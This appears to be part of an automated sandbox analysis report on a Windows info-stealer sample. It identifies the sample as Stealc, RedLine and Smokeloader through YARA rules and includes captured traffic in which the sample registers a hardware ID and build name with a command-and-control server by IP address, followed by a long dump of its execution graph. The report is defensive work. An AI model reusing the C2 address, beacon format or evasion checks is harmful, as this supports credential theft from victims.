                  Sep 25, 2024 15:32:05.799978018 CEST8049730193.233.113.184192.168.2.4
                  Sep 25, 2024 15:32:05.800129890 CEST4973080192.168.2.4193.233.113.184
                  Sep 25, 2024 15:32:05.800857067 CEST4973080192.168.2.4193.233.113.184
                  Sep 25, 2024 15:32:05.805620909 CEST8049730193.233.113.184192.168.2.4
                  Sep 25, 2024 15:32:06.473778963 CEST8049730193.233.113.184192.168.2.4
                  Sep 25, 2024 15:32:06.473910093 CEST4973080192.168.2.4193.233.113.184
                  Sep 25, 2024 15:32:06.651880980 CEST4973080192.168.2.4193.233.113.184
                  Sep 25, 2024 15:32:06.656697035 CEST8049730193.233.113.184192.168.2.4
                  Sep 25, 2024 15:32:06.868494034 CEST8049730193.233.113.184192.168.2.4
                  Sep 25, 2024 15:32:06.869553089 CEST4973080192.168.2.4193.233.113.184
                  Sep 25, 2024 15:32:11.873934984 CEST8049730193.233.113.184192.168.2.4
                  Sep 25, 2024 15:32:11.874058962 CEST4973080192.168.2.4193.233.113.184
                  Sep 25, 2024 15:32:23.053083897 CEST4973080192.168.2.4193.233.113.184
                  • 193.233.113.184
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449730193.233.113.184807484C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:32:05.800857067 CEST90OUTGET / HTTP/1.1
                  Host: 193.233.113.184
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Sep 25, 2024 15:32:06.473778963 CEST203INHTTP/1.1 200 OK
                  Date: Wed, 25 Sep 2024 13:32:06 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Sep 25, 2024 15:32:06.651880980 CEST420OUTPOST /6d687e53250c2111.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFI
                  Host: 193.233.113.184
                  Content-Length: 218
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 36 32 37 31 35 45 34 33 42 39 32 39 32 35 33 38 32 31 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 44 48 49 49 44 41 45 42 46 48 4a 4a 44 42 46 49 2d 2d 0d 0a
                  Data Ascii: ------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="hwid"EE62715E43B92925382193------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="build"LogsDiller1------JDBGDHIIDAEBFHJJDBFI--
                  Sep 25, 2024 15:32:06.868494034 CEST210INHTTP/1.1 200 OK
                  Date: Wed, 25 Sep 2024 13:32:06 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 59 6d 78 76 59 32 73 3d
                  Data Ascii: YmxvY2s=


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:09:32:03
                  Start date:25/09/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x400000
                  File size:417'280 bytes
                  MD5 hash:D792F4925D8E515A2AA89F5C9C157F2D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1880865468.00000000024BE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1880902280.00000000024EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1717820690.0000000004110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:3
                  Start time:09:32:06
                  Start date:25/09/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7484 -s 1052
                  Imagebase:0xc90000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:7.3%
                    Dynamic/Decrypted Code Coverage:7.2%
                    Signature Coverage:12.6%
                    Total number of Nodes:1425
                    Total number of Limit Nodes:27
                    execution_graph 27410 409440 strlen malloc strcpy_s free std::exception::exception 27479 40b6a0a ExitProcess 27480 41ce48 LeaveCriticalSection __mtinitlocknum 27453 40bd106 41 API calls __amsg_exit 27383 40a0005 27388 40a092b GetPEB 27383->27388 27385 40a0030 27389 40a003c 27385->27389 27388->27385 27390 40a0049 27389->27390 27404 40a0e0f SetErrorMode SetErrorMode 27390->27404 27395 40a0265 27396 40a02ce VirtualProtect 27395->27396 27398 40a030b 27396->27398 27397 40a0439 VirtualFree 27402 40a05f4 LoadLibraryA 27397->27402 27403 40a04be 27397->27403 27398->27397 27399 40a04e3 LoadLibraryA 27399->27403 27401 40a08c7 27402->27401 27403->27399 27403->27402 27405 40a0223 27404->27405 27406 40a0d90 27405->27406 27407 40a0dad 27406->27407 27408 40a0dbb GetPEB 27407->27408 27409 40a0238 VirtualAlloc 27407->27409 27408->27409 27409->27395 27411 41b050 6 API calls 3 library calls 27483 40b15b3 18 API calls ctype 27519 40a932a ??2@YAPAXI RaiseException allocator 27520 406f60 memcpy 27413 41dc60 atexit 27522 410765 279 API calls 27486 417667 lstrcpy 27456 40b1525 strtok_s strtok_s ctype 27487 41b270 5 API calls 2 library calls 27523 40a9b37 7 API calls 27417 40b1c35 110 API calls 27381 24bf20d VirtualAlloc CreateToolhelp32Snapshot Module32First 27489 40b3b7d 91 API calls 2 library calls 27490 40b6a40 6 API calls 27419 41bc11 71 API calls 2 library calls 27458 40b6d18 642 API calls 27420 40b102b strtok_s lstrlen lstrcpy 27423 40b6c57 688 API calls 27425 41ac2c 71 API calls 2 library calls 27462 40afd67 152 API calls 27491 40bbe78 162 API calls 2 library calls 27492 40bcd97 170 API calls 2 library calls 27464 40b118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27428 4090c3 5 API calls allocator 27465 40bcd8f 6 API calls 2 library calls 27430 40b102b StrCmpCA strtok_s 27432 40b3823 StrCmpCA StrCmpCA StrCmpCA strtok_s 27529 41abd0 free codecvt std::exception::_Tidy 27366 24bf2df 27367 24bf2ee 27366->27367 27370 24bfa7f 27367->27370 27373 24bfa9a 27370->27373 27371 24bfaa3 CreateToolhelp32Snapshot 27372 24bfabf Module32First 27371->27372 27371->27373 27374 24bface 27372->27374 27375 24bf2f7 27372->27375 27373->27371 27373->27372 27377 24bf73e 27374->27377 27378 24bf769 27377->27378 27379 24bf77a VirtualAlloc 27378->27379 27380 24bf7b2 27378->27380 27379->27380 27380->27380 27495 40bae93 43 API calls ctype 27530 413916 91 API calls 2 library calls 27496 40b0297 149 API calls 27531 4183dc 15 API calls 27433 40b140b StrCmpCA strtok_s lstrlen lstrcpy 27434 40bd0af RtlLeaveCriticalSection type_info::_Type_info_dtor 27497 40b32ae 22 API calls 27435 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27467 40bcd90 173 API calls 3 library calls 27498 41ceea SetUnhandledExceptionFilter 25947 4169f0 25990 402260 25947->25990 25964 417850 3 API calls 25965 416a30 25964->25965 25966 4178e0 3 API calls 25965->25966 25967 416a43 25966->25967 26123 41a9b0 25967->26123 25969 416a64 25970 41a9b0 4 API calls 25969->25970 25971 416a6b 25970->25971 25972 41a9b0 4 API calls 25971->25972 25973 416a72 25972->25973 25974 41a9b0 4 API calls 25973->25974 25975 416a79 25974->25975 25976 41a9b0 4 API calls 25975->25976 25977 416a80 25976->25977 26131 41a8a0 25977->26131 25979 416a89 25980 416b0c 25979->25980 25982 416ac2 OpenEventA 25979->25982 26135 416920 GetSystemTime 25980->26135 25985 416af5 CloseHandle Sleep 25982->25985 25986 416ad9 25982->25986 25988 416b0a 25985->25988 25989 416ae1 CreateEventA 25986->25989 25987 416b16 CloseHandle ExitProcess 25988->25979 25989->25980 26332 4045c0 17 API calls 25990->26332 25992 402274 25993 4045c0 34 API calls 25992->25993 25994 40228d 25993->25994 25995 4045c0 34 API calls 25994->25995 25996 4022a6 25995->25996 25997 4045c0 34 API calls 25996->25997 25998 4022bf 25997->25998 25999 4045c0 34 API calls 25998->25999 26000 4022d8 25999->26000 26001 4045c0 34 API calls 26000->26001 26002 4022f1 26001->26002 26003 4045c0 34 API calls 26002->26003 26004 40230a 26003->26004 26005 4045c0 34 API calls 26004->26005 26006 402323 26005->26006 26007 4045c0 34 API calls 26006->26007 26008 40233c 26007->26008 26009 4045c0 34 API calls 26008->26009 26010 402355 26009->26010 26011 4045c0 34 API calls 26010->26011 26012 40236e 26011->26012 26013 4045c0 34 API calls 26012->26013 26014 402387 26013->26014 26015 4045c0 34 API calls 26014->26015 26016 4023a0 26015->26016 26017 4045c0 34 API calls 26016->26017 26018 4023b9 26017->26018 26019 4045c0 34 API calls 26018->26019 26020 4023d2 26019->26020 26021 4045c0 34 API calls 26020->26021 26022 4023eb 26021->26022 26023 4045c0 34 API calls 26022->26023 26024 402404 26023->26024 26025 4045c0 34 API calls 26024->26025 26026 40241d 26025->26026 26027 4045c0 34 API calls 26026->26027 26028 402436 26027->26028 26029 4045c0 34 API calls 26028->26029 26030 40244f 26029->26030 26031 4045c0 34 API calls 26030->26031 26032 402468 26031->26032 26033 4045c0 34 API calls 26032->26033 26034 402481 26033->26034 26035 4045c0 34 API calls 26034->26035 26036 40249a 26035->26036 26037 4045c0 34 API calls 26036->26037 26038 4024b3 26037->26038 26039 4045c0 34 API calls 26038->26039 26040 4024cc 26039->26040 26041 4045c0 34 API calls 26040->26041 26042 4024e5 26041->26042 26043 4045c0 34 API calls 26042->26043 26044 4024fe 26043->26044 26045 4045c0 34 API calls 26044->26045 26046 402517 26045->26046 26047 4045c0 34 API calls 26046->26047 26048 402530 26047->26048 26049 4045c0 34 API calls 26048->26049 26050 402549 26049->26050 26051 4045c0 34 API calls 26050->26051 26052 402562 26051->26052 26053 4045c0 34 API calls 26052->26053 26054 40257b 26053->26054 26055 4045c0 34 API calls 26054->26055 26056 402594 26055->26056 26057 4045c0 34 API calls 26056->26057 26058 4025ad 26057->26058 26059 4045c0 34 API calls 26058->26059 26060 4025c6 26059->26060 26061 4045c0 34 API calls 26060->26061 26062 4025df 26061->26062 26063 4045c0 34 API calls 26062->26063 26064 4025f8 26063->26064 26065 4045c0 34 API calls 26064->26065 26066 402611 26065->26066 26067 4045c0 34 API calls 26066->26067 26068 40262a 26067->26068 26069 4045c0 34 API calls 26068->26069 26070 402643 26069->26070 26071 4045c0 34 API calls 26070->26071 26072 40265c 26071->26072 26073 4045c0 34 API calls 26072->26073 26074 402675 26073->26074 26075 4045c0 34 API calls 26074->26075 26076 40268e 26075->26076 26077 419860 26076->26077 26336 419750 GetPEB 26077->26336 26079 419868 26080 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26079->26080 26081 41987a 26079->26081 26082 419af4 GetProcAddress 26080->26082 26083 419b0d 26080->26083 26084 41988c 21 API calls 26081->26084 26082->26083 26085 419b46 26083->26085 26086 419b16 GetProcAddress GetProcAddress 26083->26086 26084->26080 26087 419b68 26085->26087 26088 419b4f GetProcAddress 26085->26088 26086->26085 26089 419b71 GetProcAddress 26087->26089 26090 419b89 26087->26090 26088->26087 26089->26090 26091 416a00 26090->26091 26092 419b92 GetProcAddress GetProcAddress 26090->26092 26093 41a740 26091->26093 26092->26091 26094 41a750 26093->26094 26095 416a0d 26094->26095 26096 41a77e lstrcpy 26094->26096 26097 4011d0 26095->26097 26096->26095 26098 4011e8 26097->26098 26099 401217 26098->26099 26100 40120f ExitProcess 26098->26100 26101 401160 GetSystemInfo 26099->26101 26102 401184 26101->26102 26103 40117c ExitProcess 26101->26103 26104 401110 GetCurrentProcess VirtualAllocExNuma 26102->26104 26105 401141 ExitProcess 26104->26105 26106 401149 26104->26106 26337 4010a0 VirtualAlloc 26106->26337 26109 401220 26341 4189b0 26109->26341 26112 401249 __aulldiv 26113 40129a 26112->26113 26114 401292 ExitProcess 26112->26114 26115 416770 GetUserDefaultLangID 26113->26115 26116 4167d3 GetUserDefaultLCID 26115->26116 26117 416792 26115->26117 26116->25964 26117->26116 26118 4167c1 ExitProcess 26117->26118 26119 4167a3 ExitProcess 26117->26119 26120 4167b7 ExitProcess 26117->26120 26121 4167cb ExitProcess 26117->26121 26122 4167ad ExitProcess 26117->26122 26343 41a710 26123->26343 26125 41a9c1 lstrlenA 26128 41a9e0 26125->26128 26126 41aa18 26344 41a7a0 26126->26344 26128->26126 26130 41a9fa lstrcpy lstrcatA 26128->26130 26129 41aa24 26129->25969 26130->26126 26132 41a8bb 26131->26132 26133 41a90b 26132->26133 26134 41a8f9 lstrcpy 26132->26134 26133->25979 26134->26133 26348 416820 26135->26348 26137 41698e 26138 416998 sscanf 26137->26138 26377 41a800 26138->26377 26140 4169aa SystemTimeToFileTime SystemTimeToFileTime 26141 4169e0 26140->26141 26142 4169ce 26140->26142 26144 415b10 26141->26144 26142->26141 26143 4169d8 ExitProcess 26142->26143 26145 415b1d 26144->26145 26146 41a740 lstrcpy 26145->26146 26147 415b2e 26146->26147 26379 41a820 lstrlenA 26147->26379 26150 41a820 2 API calls 26151 415b64 26150->26151 26152 41a820 2 API calls 26151->26152 26153 415b74 26152->26153 26383 416430 26153->26383 26156 41a820 2 API calls 26157 415b93 26156->26157 26158 41a820 2 API calls 26157->26158 26159 415ba0 26158->26159 26160 41a820 2 API calls 26159->26160 26161 415bad 26160->26161 26162 41a820 2 API calls 26161->26162 26163 415bf9 26162->26163 26392 4026a0 26163->26392 26171 415cc3 26172 416430 lstrcpy 26171->26172 26173 415cd5 26172->26173 26174 41a7a0 lstrcpy 26173->26174 26175 415cf2 26174->26175 26176 41a9b0 4 API calls 26175->26176 26177 415d0a 26176->26177 26178 41a8a0 lstrcpy 26177->26178 26179 415d16 26178->26179 26180 41a9b0 4 API calls 26179->26180 26181 415d3a 26180->26181 26182 41a8a0 lstrcpy 26181->26182 26183 415d46 26182->26183 26184 41a9b0 4 API calls 26183->26184 26185 415d6a 26184->26185 26186 41a8a0 lstrcpy 26185->26186 26187 415d76 26186->26187 26188 41a740 lstrcpy 26187->26188 26189 415d9e 26188->26189 27116 417500 GetWindowsDirectoryA 26189->27116 26192 41a7a0 lstrcpy 26193 415db8 26192->26193 27126 404880 26193->27126 26195 415dbe 27271 4117a0 26195->27271 26197 415dc6 26198 41a740 lstrcpy 26197->26198 26199 415de9 26198->26199 26200 401590 lstrcpy 26199->26200 26201 415dfd 26200->26201 27291 405960 39 API calls codecvt 26201->27291 26203 415e03 27292 411050 strtok_s strtok_s lstrlenA lstrcpy 26203->27292 26205 415e0e 26206 41a740 lstrcpy 26205->26206 26207 415e32 26206->26207 26208 401590 lstrcpy 26207->26208 26209 415e46 26208->26209 27293 405960 39 API calls codecvt 26209->27293 26211 415e4c 27294 410d90 7 API calls 26211->27294 26213 415e57 26214 41a740 lstrcpy 26213->26214 26215 415e79 26214->26215 26216 401590 lstrcpy 26215->26216 26217 415e8d 26216->26217 27295 405960 39 API calls codecvt 26217->27295 26219 415e93 27296 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26219->27296 26221 415e9e 26222 401590 lstrcpy 26221->26222 26223 415eb5 26222->26223 27297 411a10 121 API calls 26223->27297 26225 415eba 26226 41a740 lstrcpy 26225->26226 26227 415ed6 26226->26227 27298 404fb0 8 API calls 26227->27298 26229 415edb 26230 401590 lstrcpy 26229->26230 26231 415f5b 26230->26231 27299 410740 292 API calls 26231->27299 26233 415f60 26234 41a740 lstrcpy 26233->26234 26235 415f86 26234->26235 26236 401590 lstrcpy 26235->26236 26237 415f9a 26236->26237 27300 405960 39 API calls codecvt 26237->27300 26239 415fa0 27301 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26239->27301 26241 415fab 26242 401590 lstrcpy 26241->26242 26243 415feb 26242->26243 27302 401e80 67 API calls 26243->27302 26245 415ff0 26246 416000 26245->26246 26247 416092 26245->26247 26249 41a740 lstrcpy 26246->26249 26248 41a7a0 lstrcpy 26247->26248 26250 4160a5 26248->26250 26251 416020 26249->26251 26252 401590 lstrcpy 26250->26252 26253 401590 lstrcpy 26251->26253 26254 4160b9 26252->26254 26255 416034 26253->26255 27306 405960 39 API calls codecvt 26254->27306 27303 405960 39 API calls codecvt 26255->27303 26258 4160bf 27307 413560 36 API calls 26258->27307 26259 41603a 27304 4112d0 21 API calls codecvt 26259->27304 26262 416045 26264 401590 lstrcpy 26262->26264 26263 41608a 26266 41610b 26263->26266 26267 401590 lstrcpy 26263->26267 26265 416085 26264->26265 27305 413dc0 75 API calls 26265->27305 26269 416130 26266->26269 26271 401590 lstrcpy 26266->26271 26270 4160e7 26267->26270 26272 416155 26269->26272 26273 401590 lstrcpy 26269->26273 27308 4140b0 64 API calls codecvt 26270->27308 26276 41612b 26271->26276 26275 41617a 26272->26275 26279 401590 lstrcpy 26272->26279 26277 416150 26273->26277 26280 41619f 26275->26280 26286 401590 lstrcpy 26275->26286 27310 414780 116 API calls codecvt 26276->27310 27311 414bb0 67 API calls codecvt 26277->27311 26278 4160ec 26284 401590 lstrcpy 26278->26284 26285 416175 26279->26285 26282 4161c4 26280->26282 26287 401590 lstrcpy 26280->26287 26289 4161e9 26282->26289 26294 401590 lstrcpy 26282->26294 26288 416106 26284->26288 27312 414d70 75 API calls 26285->27312 26291 41619a 26286->26291 26292 4161bf 26287->26292 27309 415100 71 API calls 26288->27309 26295 416210 26289->26295 26301 401590 lstrcpy 26289->26301 27313 414f40 69 API calls codecvt 26291->27313 27314 407710 125 API calls codecvt 26292->27314 26300 4161e4 26294->26300 26297 416220 26295->26297 26298 4162b3 26295->26298 26303 41a740 lstrcpy 26297->26303 26302 41a7a0 lstrcpy 26298->26302 27315 415050 67 API calls codecvt 26300->27315 26305 416209 26301->26305 26307 4162c6 26302->26307 26308 416241 26303->26308 27316 419010 54 API calls codecvt 26305->27316 26309 401590 lstrcpy 26307->26309 26310 401590 lstrcpy 26308->26310 26311 4162da 26309->26311 26312 416255 26310->26312 27320 405960 39 API calls codecvt 26311->27320 27317 405960 39 API calls codecvt 26312->27317 26315 4162e0 27321 413560 36 API calls 26315->27321 26316 41625b 27318 4112d0 21 API calls codecvt 26316->27318 26319 4162ab 26322 41a7a0 lstrcpy 26319->26322 26320 416266 26321 401590 lstrcpy 26320->26321 26323 4162a6 26321->26323 26324 4162fc 26322->26324 27319 413dc0 75 API calls 26323->27319 26326 401590 lstrcpy 26324->26326 26327 416310 26326->26327 27322 405960 39 API calls codecvt 26327->27322 26329 41631c 26331 416338 26329->26331 27323 416630 9 API calls codecvt 26329->27323 26331->25987 26333 404697 26332->26333 26334 4046ac 11 API calls 26333->26334 26335 40474f 6 API calls 26333->26335 26334->26333 26335->25992 26336->26079 26339 4010c2 codecvt 26337->26339 26338 4010fd 26338->26109 26339->26338 26340 4010e2 VirtualFree 26339->26340 26340->26338 26342 401233 GlobalMemoryStatusEx 26341->26342 26342->26112 26343->26125 26345 41a7c2 26344->26345 26346 41a7ec 26345->26346 26347 41a7da lstrcpy 26345->26347 26346->26129 26347->26346 26349 41a740 lstrcpy 26348->26349 26350 416833 26349->26350 26351 41a9b0 4 API calls 26350->26351 26352 416845 26351->26352 26353 41a8a0 lstrcpy 26352->26353 26354 41684e 26353->26354 26355 41a9b0 4 API calls 26354->26355 26356 416867 26355->26356 26357 41a8a0 lstrcpy 26356->26357 26358 416870 26357->26358 26359 41a9b0 4 API calls 26358->26359 26360 41688a 26359->26360 26361 41a8a0 lstrcpy 26360->26361 26362 416893 26361->26362 26363 41a9b0 4 API calls 26362->26363 26364 4168ac 26363->26364 26365 41a8a0 lstrcpy 26364->26365 26366 4168b5 26365->26366 26367 41a9b0 4 API calls 26366->26367 26368 4168cf 26367->26368 26369 41a8a0 lstrcpy 26368->26369 26370 4168d8 26369->26370 26371 41a9b0 4 API calls 26370->26371 26372 4168f3 26371->26372 26373 41a8a0 lstrcpy 26372->26373 26374 4168fc 26373->26374 26375 41a7a0 lstrcpy 26374->26375 26376 416910 26375->26376 26376->26137 26378 41a812 26377->26378 26378->26140 26380 41a83f 26379->26380 26381 415b54 26380->26381 26382 41a87b lstrcpy 26380->26382 26381->26150 26382->26381 26384 41a8a0 lstrcpy 26383->26384 26385 416443 26384->26385 26386 41a8a0 lstrcpy 26385->26386 26387 416455 26386->26387 26388 41a8a0 lstrcpy 26387->26388 26389 416467 26388->26389 26390 41a8a0 lstrcpy 26389->26390 26391 415b86 26390->26391 26391->26156 26393 4045c0 34 API calls 26392->26393 26394 4026b4 26393->26394 26395 4045c0 34 API calls 26394->26395 26396 4026d7 26395->26396 26397 4045c0 34 API calls 26396->26397 26398 4026f0 26397->26398 26399 4045c0 34 API calls 26398->26399 26400 402709 26399->26400 26401 4045c0 34 API calls 26400->26401 26402 402736 26401->26402 26403 4045c0 34 API calls 26402->26403 26404 40274f 26403->26404 26405 4045c0 34 API calls 26404->26405 26406 402768 26405->26406 26407 4045c0 34 API calls 26406->26407 26408 402795 26407->26408 26409 4045c0 34 API calls 26408->26409 26410 4027ae 26409->26410 26411 4045c0 34 API calls 26410->26411 26412 4027c7 26411->26412 26413 4045c0 34 API calls 26412->26413 26414 4027e0 26413->26414 26415 4045c0 34 API calls 26414->26415 26416 4027f9 26415->26416 26417 4045c0 34 API calls 26416->26417 26418 402812 26417->26418 26419 4045c0 34 API calls 26418->26419 26420 40282b 26419->26420 26421 4045c0 34 API calls 26420->26421 26422 402844 26421->26422 26423 4045c0 34 API calls 26422->26423 26424 40285d 26423->26424 26425 4045c0 34 API calls 26424->26425 26426 402876 26425->26426 26427 4045c0 34 API calls 26426->26427 26428 40288f 26427->26428 26429 4045c0 34 API calls 26428->26429 26430 4028a8 26429->26430 26431 4045c0 34 API calls 26430->26431 26432 4028c1 26431->26432 26433 4045c0 34 API calls 26432->26433 26434 4028da 26433->26434 26435 4045c0 34 API calls 26434->26435 26436 4028f3 26435->26436 26437 4045c0 34 API calls 26436->26437 26438 40290c 26437->26438 26439 4045c0 34 API calls 26438->26439 26440 402925 26439->26440 26441 4045c0 34 API calls 26440->26441 26442 40293e 26441->26442 26443 4045c0 34 API calls 26442->26443 26444 402957 26443->26444 26445 4045c0 34 API calls 26444->26445 26446 402970 26445->26446 26447 4045c0 34 API calls 26446->26447 26448 402989 26447->26448 26449 4045c0 34 API calls 26448->26449 26450 4029a2 26449->26450 26451 4045c0 34 API calls 26450->26451 26452 4029bb SetFilePointer 26451->26452 26453 4045c0 34 API calls 26452->26453 26454 4029ed 26453->26454 26455 4045c0 34 API calls 26454->26455 26456 402a06 26455->26456 26457 4045c0 34 API calls 26456->26457 26458 402a1f 26457->26458 26459 4045c0 34 API calls 26458->26459 26460 402a38 26459->26460 26461 4045c0 34 API calls 26460->26461 26462 402a51 26461->26462 26463 4045c0 34 API calls 26462->26463 26464 402a6a 26463->26464 26465 4045c0 34 API calls 26464->26465 26466 402a83 26465->26466 26467 4045c0 34 API calls 26466->26467 26468 402a9c 26467->26468 26469 4045c0 34 API calls 26468->26469 26470 402ab5 26469->26470 26471 4045c0 34 API calls 26470->26471 26472 402ace 26471->26472 26473 4045c0 34 API calls 26472->26473 26474 402ae7 26473->26474 26475 4045c0 34 API calls 26474->26475 26476 402b00 26475->26476 26477 4045c0 34 API calls 26476->26477 26478 402b19 26477->26478 26479 4045c0 34 API calls 26478->26479 26480 402b32 26479->26480 26481 4045c0 34 API calls 26480->26481 26482 402b4b 26481->26482 26483 4045c0 34 API calls 26482->26483 26484 402b64 26483->26484 26485 4045c0 34 API calls 26484->26485 26486 402b7d 26485->26486 26487 4045c0 34 API calls 26486->26487 26488 402b96 26487->26488 26489 4045c0 34 API calls 26488->26489 26490 402baf 26489->26490 26491 4045c0 34 API calls 26490->26491 26492 402bc8 26491->26492 26493 4045c0 34 API calls 26492->26493 26494 402be1 26493->26494 26495 4045c0 34 API calls 26494->26495 26496 402bfa 26495->26496 26497 4045c0 34 API calls 26496->26497 26498 402c13 26497->26498 26499 4045c0 34 API calls 26498->26499 26500 402c2c 26499->26500 26501 4045c0 34 API calls 26500->26501 26502 402c45 26501->26502 26503 4045c0 34 API calls 26502->26503 26504 402c5e 26503->26504 26505 4045c0 34 API calls 26504->26505 26506 402c77 26505->26506 26507 4045c0 34 API calls 26506->26507 26508 402c90 26507->26508 26509 4045c0 34 API calls 26508->26509 26510 402ca9 26509->26510 26511 4045c0 34 API calls 26510->26511 26512 402cc2 26511->26512 26513 4045c0 34 API calls 26512->26513 26514 402cdb 26513->26514 26515 4045c0 34 API calls 26514->26515 26516 402cf4 26515->26516 26517 4045c0 34 API calls 26516->26517 26518 402d0d 26517->26518 26519 4045c0 34 API calls 26518->26519 26520 402d26 26519->26520 26521 4045c0 34 API calls 26520->26521 26522 402d3f 26521->26522 26523 4045c0 34 API calls 26522->26523 26524 402d58 26523->26524 26525 4045c0 34 API calls 26524->26525 26526 402d71 26525->26526 26527 4045c0 34 API calls 26526->26527 26528 402d8a 26527->26528 26529 4045c0 34 API calls 26528->26529 26530 402da3 26529->26530 26531 4045c0 34 API calls 26530->26531 26532 402dbc 26531->26532 26533 4045c0 34 API calls 26532->26533 26534 402dd5 26533->26534 26535 4045c0 34 API calls 26534->26535 26536 402dee 26535->26536 26537 4045c0 34 API calls 26536->26537 26538 402e07 26537->26538 26539 4045c0 34 API calls 26538->26539 26540 402e20 26539->26540 26541 4045c0 34 API calls 26540->26541 26542 402e39 26541->26542 26543 4045c0 34 API calls 26542->26543 26544 402e52 26543->26544 26545 4045c0 34 API calls 26544->26545 26546 402e6b 26545->26546 26547 4045c0 34 API calls 26546->26547 26548 402e84 26547->26548 26549 4045c0 34 API calls 26548->26549 26550 402e9d 26549->26550 26551 4045c0 34 API calls 26550->26551 26552 402eb6 26551->26552 26553 4045c0 34 API calls 26552->26553 26554 402ecf 26553->26554 26555 4045c0 34 API calls 26554->26555 26556 402ee8 26555->26556 26557 4045c0 34 API calls 26556->26557 26558 402f01 26557->26558 26559 4045c0 34 API calls 26558->26559 26560 402f1a 26559->26560 26561 4045c0 34 API calls 26560->26561 26562 402f33 26561->26562 26563 4045c0 34 API calls 26562->26563 26564 402f4c 26563->26564 26565 4045c0 34 API calls 26564->26565 26566 402f65 26565->26566 26567 4045c0 34 API calls 26566->26567 26568 402f7e 26567->26568 26569 4045c0 34 API calls 26568->26569 26570 402f97 26569->26570 26571 4045c0 34 API calls 26570->26571 26572 402fb0 26571->26572 26573 4045c0 34 API calls 26572->26573 26574 402fc9 26573->26574 26575 4045c0 34 API calls 26574->26575 26576 402fe2 26575->26576 26577 4045c0 34 API calls 26576->26577 26578 402ffb 26577->26578 26579 4045c0 34 API calls 26578->26579 26580 403014 26579->26580 26581 4045c0 34 API calls 26580->26581 26582 40302d 26581->26582 26583 4045c0 34 API calls 26582->26583 26584 403046 26583->26584 26585 4045c0 34 API calls 26584->26585 26586 40305f 26585->26586 26587 4045c0 34 API calls 26586->26587 26588 403078 26587->26588 26589 4045c0 34 API calls 26588->26589 26590 403091 26589->26590 26591 4045c0 34 API calls 26590->26591 26592 4030aa 26591->26592 26593 4045c0 34 API calls 26592->26593 26594 4030c3 26593->26594 26595 4045c0 34 API calls 26594->26595 26596 4030dc 26595->26596 26597 4045c0 34 API calls 26596->26597 26598 4030f5 26597->26598 26599 4045c0 34 API calls 26598->26599 26600 40310e 26599->26600 26601 4045c0 34 API calls 26600->26601 26602 403127 26601->26602 26603 4045c0 34 API calls 26602->26603 26604 403140 26603->26604 26605 4045c0 34 API calls 26604->26605 26606 403159 26605->26606 26607 4045c0 34 API calls 26606->26607 26608 403172 26607->26608 26609 4045c0 34 API calls 26608->26609 26610 40318b 26609->26610 26611 4045c0 34 API calls 26610->26611 26612 4031a4 26611->26612 26613 4045c0 34 